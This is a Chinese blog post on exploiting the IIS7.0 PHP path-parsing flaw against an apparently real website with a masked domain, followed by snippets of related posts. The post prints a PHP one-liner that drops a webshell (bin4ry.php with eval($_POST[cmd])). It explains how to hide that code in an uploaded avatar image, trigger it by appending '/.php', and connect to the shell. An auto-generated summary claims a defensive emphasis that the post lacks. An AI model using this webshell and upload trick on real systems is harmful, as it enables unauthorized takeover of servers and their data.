IIS7.0 php 错误文件解析漏洞利用实例

最新推荐文章于 2024-07-09 19:47:34 发布
最新推荐文章于 2024-07-09 19:47:34 发布
阅读量5.4k 收藏 1
点赞数
分类专栏: hacking 文章标签: iis php cmd
通过在特定网站上使用一句话木马,作者详细介绍了如何上传包含木马的图片,并通过特定路径解析出PHP文件,实现木马的部署。文章强调了此操作对于理解网站安全漏洞和防御策略的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

得到 www.xxxxxxxxi.com web服务为IIS7.0
 

www.xxxxxxxxi.com/robots.txt后面加上/任意字符.php成功解析为php


注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马


 
<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>

 

如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话木马,密码cmd

 
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php

用一句话木马连接

Iis7.0 cgi解析漏洞复现
孤的博客
09-30 651
漏洞原因: 漏洞PHP配置有关,php.ini中的参数cgi.fix_pathinfo参数配置错误导致解析漏洞,开启了cgi.fix_pathinfo php.ini里默认cgi.fix_pathinfo=1,对其进行访问的时候,在URL路径后添加.php后缀名会当做php文件进行解析漏洞由此产生 是在 IIS7.5+php5.3+FastCGI 下的测试情况 漏洞条件 php.ini里...
文件上传漏洞-07】中间件文件解析漏洞概述及实例——Apache、IIS和Nginx
m0_64378913的博客
07-12 3702
(1)第一种:未知扩展名解析漏洞 Apache对文件解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
IIS7.0解析漏洞
大方子
07-23 6364
实验环境 windows server 2008(x64) IIS7 phpStudyIIS 2016版本 漏洞条件 1. php.ini里的cgi.cgi_pathinfo=1 2. IIS7在Fast-CGI运行模式下 漏洞复现 先搭建IIS7 这里记得勾选CGI 然后我们在PHPStudy安装好并切...
报错 | Access to XMLHttpRequest at ‘http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login‘ from origin
A123ppleQueen的博客
11-22 51万+
Access to XMLHttpRequest at 'http://www.xxxxxxx.cn/xxxxx/xxxxx/xxxxx/login' from origin 'http://xx.x.x.xx:xxxx' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is pre
在网址上输入www.xxx.com到返回界面给用户发生了什么?
weixin_51287642的博客
08-06 30万+
在网址上输入www.xxx.com到返回界面给用户发生了什么? DNS域名解析(https://blog.csdn.net/yanshuanche3765/article/details/82589210)–>tcp三次握手建立连接(https://blog.csdn.net/xy010902100449/article/details/48274635)–>向服务器发送http请求,请求html文件–>服务器返回一个html文件–>tcp四次握手释放连接–>游览器解释html
虚拟机上配置xxx.com跳转到www.xxx.com
maorenqi101的专栏
07-24 6万+
三个地方要注意: 一、116.XXX.XXX.206(外网服务器)上的nginx.conf上配置: server_name xxx.com www.xxx.com; 保存重启nginx 二、内网服务器上(192.168.0.83)xxx.com.conf文件上配置如下:         ServerName xxx.com         ServerAlias www.xxx.com  
文件解析漏洞总结(IIS,APACHE,NGINX)
st3pby的博客
11-03 1575
文件解析漏洞总结(IIS,APACHE,NGINX)
文件包含漏洞相关知识总结
qq_27710251的博客
08-16 1542
文件包含漏洞相关知识总结 1. 文件包含漏洞概念 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入 2. 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 3. 常见文件包含函数 include() require() include_
生产实习--启明星辰 第四天(Web网络安全基础知识,sql注入,xss攻击,csrf与ssrf,xxe攻击,未授权漏洞漏洞,常见中间件攻击,文件包含,流量特征)
最新发布
TuYHAAAAAA的博客
07-09 1609
CSRF漏洞攻击原理:客户端请求伪造,在我看来,假如我是黑客,我想访问网站A,但是这个网站A要付费,我没钱呀,我就找到一个人他要访问两个网站分别是A网站和B网站,我就黑了网站B,在他同时访问这两个网站时,我就偷偷发送一个有危害的请求,来获取A网站的cookie从而用他的账号密码来访问这个A网站。SSRF跨站请求伪造:服务端请求伪造,在我看来,就是操作服务器骗取客户端数据信息。外部实体注入,是一种利用XML解析器处理XML文档时的安全漏洞进行的攻击。
web渗透实例
12-08
### Web渗透实例——深入解析与实战经验分享 #### 一、背景介绍 本文是一次针对特定网站进行渗透测试的真实案例记录。渗透测试的目标是评估Web应用的安全性,并识别潜在的安全漏洞。作者kyo327在文章中详细描述了...
XXX.rar_H XXX_XXX.www._https://cn.txxx.com_wwwxxxex_xxxwww.98
09-23
信号处理入门级程序,包含了数据采集,频谱分析等
nginx对于XXX.com和XXX.com/index给映射到www.xxx.com的方式
fhb19870610的专栏
05-15 46万+
location / {             root    C:/website;             index   index.html index.htm index.php;             include C:/website/.htaccess; if ($host !~ "www.xincanzs.com") { rewrite
HEAP: Free Heap block XXXXXXXX modified at XXXXXXXX after it was freed
热门推荐
mons_xujingtao的博客
07-11 105万+
在有关于内存分配和释放的代码中,容易发生这种问题。这个问题的描述就是内存已经被释放了,后面还继续使用举个例子:float* distance = new float [dimension]; for(int k=0;k&lt;10;k++) {     for(int i=0;i&lt;dimension;i++)     {     distance[i]=0;     } delete[] d...
HEAP: Free Heap block xxxxxxxx modified at xxxxxxxx after it was freed
~ 飞 扬 的 天 空 ~
01-14 5万+
http://blog.sina.com.cn/s/blog_a17b071c01015rwd.html 《诸子百家》发布后,发现游戏在有些情况下会崩溃。偶然崩溃。        由于我是负责主框架,网络协议和登录,数据等,所以这个修正bug的任务主要就落在我头上了。               一、bug        1.最头疼的bug     
微信公众平台开发Token验证
Nancy771959506的专栏
03-01 3737
前言:微信公众号扫码登录--URL\、token配置; 配置URL:https://www.XXXXXXXX.com/WechatTest.jsp Token:XXXXXXX WechatTest.jsp代码: <%@page import="com.wechat.SignatureVerify"%> <%@page import="org.apache.xmlbeans.impl.xb.xsdschema.Public"%> <%@ page language.
例子(点击www.xxx.com/yyy/index.php)
linux系统、网络编程和分布式计算
04-11 5万+
一 点击www.xxx.com/yyy/index.php发生的事情: (1)浏览器向DNS请求解析www.xxx.com的IP地址。 (2)DNS系统解析出www.xxx.com的IP地址。 (3)浏览器用得到的IP地址与服务器建立TCP连接(三次握手): *客户端TCP发送一个连接请求到远端服务器(目的主机),利用解析得到的IP地址发送一份IP数据报。如果目的主机在本地网络上,
ping: www.xxx.com: 未知的名称或服务
JolyouLu的博客
05-02 8万+
ping: www.xxx.com: 未知的名称或服务 在使用虚拟机时,若遇到ping: www.xxx.com: 未知的名称或服务,通常都是因为DNS为配置导致的 编辑网卡参数 执行如下命令 #进入到liunx网络配置的目录 cd /etc/sysconfig/network-scripts #编辑网卡参数 vim ifcfg-ens33 注意:编辑网卡时要注意,每个人网卡名称不一样的,我的网卡是ifcfg-ens33进入你们自己相应的网卡即可 添加DNS 进入之后添加dns服务器,8.8.8.
js页面操作及框架操作
千分之想
07-16 1034
window.location = "http://www.xxxxxxxx.net" 跳转后有后退功能  其实应该是 window.location.href window.location.replace("http://www.xxxxxxxx.net") 跳转后没有后退功能  window.open("http://www.xxxxxxxx.net") 要新的窗口打开链接  这
XXXXXXXXXXX
roroyangivan的专栏
10-31 8万+
package thread; public class VolatileTest { public static volatile int race = 0; public static void increase(){ race++; } private static final int THREAD_COUNT = 20; public
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值